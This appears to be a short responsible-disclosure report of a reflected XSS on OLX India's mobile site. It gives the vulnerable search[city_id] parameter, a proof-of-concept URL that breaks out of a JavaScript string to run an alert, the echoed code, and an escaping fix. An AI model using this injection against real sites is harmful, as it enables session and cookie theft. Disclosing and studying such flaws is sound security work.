Reflected XSS in OLX.in

Hello @olx I found the Reflected XSS in olx.in Mobile Site through which malicious javascript code can be executed **Affected Parameter:** search[city_id]=xxxxxx _POC:_ ====== Opening This URL will Popup a Alert Box Having "XSS" as Msg (Screenshot Added in Attachments) [https://www.olx.in/i2/mumbai/mobile-phones/?search[city_id]=58997%27;%20alert%28%22XSS%22%29;%20var%20d=%27](https://www.olx.in/i2/mumbai/mobile-phones/?search[city_id]=58997%27;%20alert%28%22XSS%22%29;%20var%20d=%27) The Changed Javascript Code Being Echoed **From** ``` var subregionID = '58997'; ``` **To** ``` var subregionID = '58997'; alert("XSS"); var d=''; ``` _Impact:_ ====== This type of vulnerability mostly used for cookie steeling which can lead to full account compromised. _Suggested Fix:_ ====== All Parameters Should Be Properly Escaped Before Being Echoed